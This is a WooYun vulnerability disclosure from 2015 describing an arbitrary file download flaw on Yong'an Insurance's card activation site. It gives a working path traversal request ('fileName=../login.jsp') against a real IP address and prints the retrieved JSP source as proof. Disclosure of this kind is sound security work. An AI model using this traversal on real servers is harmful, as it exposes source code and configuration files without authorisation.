当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142617

漏洞标题:永安保险某保险卡站点设计不当存在任意文件下载漏洞

相关厂商:永安财产保险股份有限公司

漏洞作者: 路人甲

提交时间:2015-09-22 11:05

修复时间:2015-09-27 11:06

公开时间:2015-09-27 11:06

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

任意文件下载

详细说明:

http://1.85.2.249/online/web/sale/card/login.jsp

1.jpg


看到有一处点了 会下载PDF文件
http://1.85.2.249/online/sale/card/downloadPage.do?fileName=190.pdf
果断替换后面的
先现在index.jsp测试下 我用的火狐测试

2.jpg


<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <base href="<%=basePath%>">
    
    <title>JasperReport事例</title>
	<meta http-equiv="pragma" content="no-cache">
	<meta http-equiv="cache-control" content="no-cache">
	<meta http-equiv="expires" content="0">    
	<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
	<meta http-equiv="description" content="This is my page">
	<!--
	<link rel="stylesheet" type="text/css" href="styles.css">
	-->
  </head>
  
  <body>
    <s:form action="iReport.action">
      报表格式:
      <s:select name="formatType" list="#{'HTML':'HTML','PDF':'PDF','XLS':'XLS','RTF':'RTF'}"></s:select>
      <s:submit value="确定"/>
    </s:form>
    <s:form action="iReport2.action">
      <s:submit value="下载"/>
    </s:form>
    <s:form action="toPrint.action">
      <s:submit value="打印"/>
    </s:form>
  </body>
</html>


在下载一个http://1.85.2.249/online/web/sale/card/login.jsp
的login.jsp
http://1.85.2.249/online/sale/card/downloadPage.do?fileName=../login.jsp

3.jpg


4.jpg

漏洞证明:

login.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@ include file="/common/taglibs.jsp" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <title>永安保险</title>
    <link href="${ctx }/css/common/formCheck.css" type="text/css" rel="stylesheet" />
    <link href="${ctx }/css/cssCard/master.css" type="text/css" rel="stylesheet"/>
    <script type="text/javascript" src="${ctx}/js/jquery-1.6.2.min.js"></script>
    <script type="text/javascript" src="${ctx }/web/sale/card/js/common.js"></script>
    <script type="text/javascript" src="${ctx }/js/checkform/formCheck.validation.js"></script>
	<script type="text/javascript" src="${ctx }/js/checkform/formCheck.extend.js"></script>
	<script type="text/javascript" src="${ctx }/js/trimForm.js"></script>
	<script type="text/javascript" src="${ctx}/js/public/common.js"></script>
	<script><%-- google web Analytics--%>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-49712039-1', '1.85.2.249');
  ga('send', 'pageview');
</script>
</head>
<%@ include file="/common/service/messageLayer.jsp"%>
<body class="body_bg">
<input id="cardmsg" type="hidden" value="${errormsg }"/>
<div class="index_bg">
    <div id="header">
        <div class="top">&nbsp;</div>
        <div class="logo"><a href="#" title="永安保险"><img src="${ctx }/images/imagesCard/logo.gif" width="321" height="48" alt="永安保险"/></a></div>
        <div class="clear"></div>
    </div>
    <div id="content">
        <div class="insure_left">
            <div class="l">
                <img width="240" height="60" src="${ctx }/images/imagesCard/cardServices.gif">
            </div>
            <div class="l margT10 margB10">
                <img width="240" height="37" src="${ctx }/images/imagesCard/activeOnline.gif">
            </div>
               <%@ include file="/web/sale/card/common/menu.jsp" %>
        </div>
        <div class="insure_right">   
            <span class="bg_1"></span>
            <div class="auto_fast">
                <h2>您现在的位置:保险卡&nbsp;&gt;&nbsp;保险卡激活</h2>
                <div class="clear"></div>
                <div class="auto_vehicle">
                    <dl>
                        <dt><span>请输入您的卡号及密码</span></dt>
                    </dl>
                  
                    <div class="info">
                      <form id="subFm" action="${ctx }/sale/card/login.do" method="post">
                        <ul>
                            <li></li>
                            <li><label><b class="col_e83">*</b>卡&#12288;号</label><input id="quoteNo" name="geQuoteMain.cardNo" type="text" class="input_text" 
                                bind="focus" tipmsg="请输入卡号" tipid="quoteNo_tip" trim cType="notEmpty|myRule" errmsg="不允许为空|格式不正确"/>  
		                              <span id="quoteNo_tip" style="position: absolute;"></span>  
                                </li>
                            <li><label><b class="col_e83">*</b>密&#12288;码</label><input id="pwd" name="geQuoteMain.flag" type="password" class="input_text"
                           bind="focus" tipmsg="请输入密码" tipid="pwd_tip" trim cType="notEmpty|regexp" regexp="^[0-9]{1,10}$" errmsg="不允许为空|格式不正确"/>
                            <span id="pwd_tip" style="position: absolute;"></span>
                           </li>
                            <li style="position: relative;"><label>验证码</label><input class="input_check" type="text" name="input" id="rand">
                            <a href="javascript:changeImage();"><img id="randImge" src="${ctx }/CreateImage" style="position:absolute;left: 335px;top:0"/></a>
		                       <span id="rand_tip" tipresult="false" style="position: absolute;left:380px"></span>
                            </li>
                        </ul>
                        <div class="button_login"> <a href="javascript:subForm();" class="vip_login">&nbsp;</a></div><div class="clear"></div>
                   </form> </div>
                    <div class="active_steps_wrap">●&nbsp;激活流程
                        <div class="active_steps">
                            <dl> 1.输入保险卡卡号及密码</dl>
                            <span class="l" style="font-weight: normal;padding-top: 12px">&gt;</span>
                            <dl>2.阅读“投保说明”</dl>
                            <span class="l" style="font-weight: normal;padding-top: 12px">&gt;</span>
                            <dl>3.填写激活信息</dl><span class="arrow">&nbsp;</span>
                            <div class="clear"></div>
                            <dl>6.下载电子保单</dl>
                            <span class="l" style="font-weight: normal;padding-top: 12px">&lt;</span>
                            <dl>5.激活成功</dl>
                            <span class="l" style="font-weight: normal;padding-top: 12px">&lt;</span>
                            <dl>4.保单信息确认</dl>
                            <div class="clear"></div>
                        </div>
                        <div class="clear"></div>
                    </div>
                </div>
                <br>
             <div>
                  <dl>
	                  <dt>
		                  <span style="color:#FF6600">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		                  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		                  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		                  &nbsp;提示:尊敬的客户,为了使您在激活流程中获得较好的体验,请使用IE高版本及其他主流浏览器。
		                  </span>
	                  </dt>
                  </dl>
             </div>
            </div>
            <span class="bg_2"></span>
        </div>
        <div class="clear"></div>
      <%@include file="/web/sale/card/common/foot.jsp" %>
    </div>
    <div id="footer">版权所有 © 永安财产保险股份有限公司</div>
</div>
</body>
<script type="text/javascript">
$(function(){
	var errormsg = $("#cardmsg").val();
	if(errormsg != null && errormsg != ''){
	          showError(errormsg);
	}
})
var check = new SFEC();
$(document).ready(function(){
	check.setForm("subFm");
	check.addRule('myRule',function(obj){
		return /[0-9]{1,12}/.test($(obj).val());
	});
	check.start();
});
function changeImage(){
	$("#randImge").attr("src","${ctx}/CreateImage?"+ Math.random());
}
/**ajax验证验证码**/
function checkCode() {
	var dataFlag = false;
	$.ajax({
		type : "POST",
		async : false,
		url : '${ctx}/sale/card/checkAjax.do?temp='+new Date().getTime(),
		dataType : 'text',
		data : {checkCode : $("#rand").val()},
		success : function(data){
			if($.trim(data) == "success") {
				dataFlag = true;
			} else {
				dataFlag = false;
			}
		}
	});
	return dataFlag;
}
function subForm(){
	if(check.result(true)){
		if(checkCode()){
			//提交表单
			$("#subFm").submit();
		}else{
			//验证码错误
			 $("#rand_tip").text("验证码输入错误");
			changeImage();
			$("#rand").val("");
		}
	}
}
</script>
</body>
</html>

修复方案:

白名单

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-27 11:06

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无